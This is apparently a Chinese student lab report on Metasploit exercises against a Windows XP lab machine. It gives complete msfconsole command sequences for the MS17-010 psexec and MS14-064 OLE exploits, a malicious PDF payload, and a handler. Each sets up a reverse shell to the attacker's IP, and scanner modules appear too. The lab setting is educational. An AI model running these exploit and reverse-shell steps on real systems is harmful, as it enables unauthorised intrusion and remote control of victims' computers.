ms17_010_psexec(√) 不惟一shell
ms14_064_ole_lode_execution(√)不惟一windows
scanner/http/ssl_version(√)不惟一浏览器
scanner/portscan/tcp (√)不惟一网络
scanner/oracle/tnslsnr_version (√)惟一session
msf > use exploit/windows/smb/ms17_010_psexec msf exploit(windows/smb/ms17_010_psexec) > show payloads msf exploit(windows/smb/ms17_010_psexec) > set payload generic/shell_reverse_tcp //tcp反向回连 msf exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.153.135 //攻击机ip msf exploit(windows/smb/ms17_010_psexec) > set LPORT 5237 //攻击端口 msf exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.153.136 //靶机ip,特定漏洞端口已经固定 msf exploit(windows/smb/ms17_010_psexec) > run //攻击
msfconsole msf > use windows/browser/ms14_064_ole_code_execution set payload windows/meterpreter/reverse_tcp //http反向回连 set LHOST 192.168.153.135//攻击机ip set Lport 5237//攻击端口固定 exploit //攻击
能够看到生成的一个URL:http://192.168.153.135:8080/YT1IHT
oracle
在XP的IE上点开后:
tcp
回到Kali,查看sessions,输入sessions -i 4后,发现攻击成功,得到shell功能
编码
search Adobe set payload windows/meterpreter/reverse_tcp set LHOST 192.168.153.135 set LPORT 5237 set filename 20165237.pdf exploit
找到pdf文件(要打开显示隐藏文件选项)3d
back use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.153.135 set LPORT 5237 exploit
接着在xp中点开pdf文件,回到kali,发现回传了一些东西。
code
查看sessions,输入session -i 1,发现攻击成功,可使用shell。
tcp扫描成功:
ssl版本模块扫描成功:
OracleSQL的监听服务攻击成功:
exploit:针对靶机的漏洞,利用靶机中的后门,对靶机进行攻击。
payload:能够实现任何运行在受害者环境中的程序所能作的事情,而且可以执行动做包括破坏文件删除文件,向病毒的做者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。说白了就是传送到靶机上的用来攻击的恶意代码。
encode:对payload进行编码
离实战还缺些什么技术或步骤?
一、在实践中发现MSF攻击的局限性很大,其中的漏洞几乎都是针对win XP系统,而实际应用的系统大部分是win7及以上的系统,若是须要实战攻击win7及以上的系统,还须要不断发现并成功利用新的漏洞。
二、须要提升扫描等信息收集技术,信息收集是作攻击的重要前提,但大多数初级的扫描都会被win7及以上的系统发现甚至拒绝,因此提供相应的技术很重要。
感想:
此次实验花费了不少时间去查找能攻击成功的漏洞,可是让我对于msf更加熟练,甚至更加崇拜,但愿之后可以使用它更多的领域。